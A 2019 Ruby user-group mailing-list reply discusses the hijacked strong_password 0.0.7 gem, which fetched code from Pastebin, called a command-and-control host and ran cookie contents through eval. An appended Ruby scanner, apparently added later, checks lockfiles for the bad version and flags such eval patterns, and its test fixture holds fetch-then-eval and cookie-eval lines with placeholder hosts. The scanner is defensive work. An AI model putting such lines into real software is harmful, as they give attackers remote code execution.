[LRUG] strong_password v0.0.7 rubygem hijacked
Edmond Lepedus
ed.lepedus at googlemail.com
Tue Jul 9 08:31:18 PDT 2019
Awesome catch — thanks for the heads-up!
Now, about that code. Isn’t it strange that they use Net::HTTP to get the code from Pastebin, but then use Faraday to call their C&C domain? Methinks they would have done better to stick to Net::HTTP, since Faraday may not always be available. Looks almost like it was written by someone else.
Still, making it eval cookies is pretty ingenious 😈
> On 8 Jul 2019, at 18:01, Paul Makepeace <paulm at paulm.com> wrote:
>
> TL;DR: make sure you're not using strong_password 0.0.7
>
> This is a great story and debug. Yay for developers checking changes
> in upgraded gems!
>
> https://withatwist.dev/strong-password-rubygem-hijacked.html
> _______________________________________________
> Chat mailing list
> Chat at lists.lrug.org
> Archives: http://lists.lrug.org/pipermail/chat-lrug.org
> Manage your subscription: http://lists.lrug.org/options.cgi/chat-lrug.org
> List info: http://lists.lrug.org/listinfo.cgi/chat-lrug.org
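Two checks a team could run after a report like the one above, as an added example that is not part of this thread or of the write-up it links: first, does Gemfile.lock pin a version named in an advisory (here a constructed table holding only strong_password 0.0.7, the version the TL;DR warns about); second, does any installed source contain the shape Edmond describes, data fetched with Net::HTTP or taken from cookies and then handed to eval. The sample lockfile and sample source are constructed fixtures for the scanner, the `pastebin.example` and `cc.example` hosts are placeholders, and the taint patterns are a heuristic, not a complete malware detector.

```ruby
# Added example (not from the LRUG thread or the linked write-up).
# Two defender-side checks after a "gem hijacked" report:
#   1. affected_gems:     does Gemfile.lock resolve a version named in an advisory?
#   2. suspicious_lines:  does a source file eval data that came from the network
#                         or from request cookies (the pattern described in the thread)?
# The advisory table and both sample inputs below are constructed for this example.
require "set"

# Constructed advisory table: gem name => versions reported as bad.
KNOWN_BAD = { "strong_password" => Set["0.0.7"] }.freeze

# Parse every "specs:" section of a Gemfile.lock and return [name, version] pairs.
# Resolved gems sit at exactly four spaces of indent; their dependencies at six.
def locked_gems(lockfile_text)
  gems = []
  in_specs = false
  lockfile_text.each_line do |line|
    if line =~ /^\s*specs:\s*$/
      in_specs = true
      next
    end
    in_specs = false if line =~ /^\S/          # new top-level section (PLATFORMS, DEPENDENCIES, ...)
    next unless in_specs
    if (m = line.match(/\A {4}(\S+) \(([^)]+)\)\s*\z/))
      gems << [m[1], m[2]]
    end
  end
  gems
end

# Locked gems whose exact version appears in the advisory table.
def affected_gems(lockfile_text)
  locked_gems(lockfile_text).select { |name, ver| KNOWN_BAD[name]&.include?(ver) }
end

# Heuristic taint sources: HTTP clients, pastebin hosts, cookie access.
TAINTED_SOURCE = /Net::HTTP|Faraday|cookies?\b|open-uri|URI\.open|pastebin/i
EVAL_CALL = /\b(?:instance_|class_|module_)?eval\b/

# Return [line_number, code] for each eval whose argument is a tainted source
# directly, or a local/instance variable previously assigned from one.
def suspicious_lines(source_text)
  tainted_vars = Set.new
  hits = []
  source_text.each_line.with_index(1) do |line, lineno|
    code = line.strip
    next if code.empty? || code.start_with?("#")
    # remember "var = <something fetched from the network or the request>"
    if (m = code.match(/\A(@?[a-z_]\w*)\s*=\s*(.+)\z/)) && m[2] =~ TAINTED_SOURCE
      tainted_vars << m[1]
    end
    next unless code =~ EVAL_CALL
    arg = code.sub(/\A.*?#{EVAL_CALL}\s*\(?/, "")   # text after the eval call
    direct = arg =~ TAINTED_SOURCE
    via_var = tainted_vars.any? { |v| arg =~ /(?<![\w.])#{Regexp.escape(v)}\b/ }
    hits << [lineno, code] if direct || via_var
  end
  hits
end

# Constructed Gemfile.lock excerpt (not a real project's lockfile).
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      bcrypt (3.1.13)
      strong_password (0.0.7)
        bcrypt (~> 3.1)

  PLATFORMS
    ruby

  DEPENDENCIES
    strong_password (~> 0.0.7)
LOCK

# Constructed source fixture with placeholder hosts (not the hijacked gem's code).
SAMPLE_SOURCE = <<~'SRC'
  # harmless: eval of a literal, not flagged
  eval("1 + 1")
  # staged fetch-then-eval, the shape the thread describes
  payload = Net::HTTP.get(URI("https://pastebin.example/raw/PLACEHOLDER"))
  eval(payload)
  # eval of request-controlled data
  eval(request.cookies["session"])
  # plain HTTP call without eval, not flagged on its own
  Faraday.get("https://cc.example/")
SRC

def audit(lockfile_text, source_text)
  { affected: affected_gems(lockfile_text), suspicious: suspicious_lines(source_text) }
end

if __FILE__ == $PROGRAM_NAME
  report = audit(SAMPLE_LOCK, SAMPLE_SOURCE)
  report[:affected].each { |name, ver| puts "affected gem: #{name} #{ver}" }
  report[:suspicious].each { |ln, code| puts "suspicious line #{ln}: #{code}" }
end
```

Run it against a real Gemfile.lock and the files under `gem contents <name>` to turn the TL;DR into a repeatable check; the variable-tracking in `suspicious_lines` is deliberately simple (same file, straight-line assignment), so treat a hit as a prompt to read the diff, not as proof of compromise.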